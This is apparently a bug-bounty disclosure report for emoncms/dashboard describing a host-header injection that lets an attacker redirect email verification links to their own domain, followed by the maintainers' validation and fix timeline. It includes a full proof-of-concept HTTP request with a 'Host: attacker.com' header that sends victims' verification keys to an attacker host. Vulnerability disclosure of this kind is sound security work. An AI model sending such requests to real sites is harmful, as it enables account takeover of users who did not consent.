Misinterpretation of Input in emoncms/dashboard


Reported on

Jul 22nd 2021

ūüí• BUG

account takeover via host-header injection It allow attacker to change url of account-verification link and verify any email-address .


1. First as attacker create a account with email abc@gmail.com. You dont own that email-address .
You cant login untill you verify that email address. But you are not owner of that email .
Now attacker send bellow account-verify request

GET /user/resend-verify.json?&username=bounty HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://emonsdfcms.org/
Cookie: PHPSESSID=juvfp27bj0234ib10irro8a06e

Here in this request header see i put Host: attacker-domain.com and send the request .
Now vicitm email address will received a verification link like https://attacker-domain.com/user/verify?email=yagefix460@dedatre.com&key=49939b70ea5ee9979a67376d47d59a7b .
Here in this url see attacker domain . When vicitm will open his mail and click that verification link then verification code will be sent to attacker-domain .\

We have contacted a member of the emoncms/dashboard team and are waiting to hear back 4 months ago
ranjit-git modified their report
4 months ago
A emoncms/dashboard maintainer validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
A emoncms/dashboard maintainer confirmed that a fix has been merged on 58af4f 4 months ago
The fix bounty has been dropped
A emoncms/dashboard maintainer
4 months ago

I've fixed this vulnerability in the core emoncms/emoncms repository:


Thanks a lot for notifying me of this vulnerability!

A emoncms/dashboard maintainer
4 months ago

The fix suggests that the user set's their emoncms domain manually in the emoncms settings file which ensures that $_SERVER['HOST'] is not used to discover the installations domain name.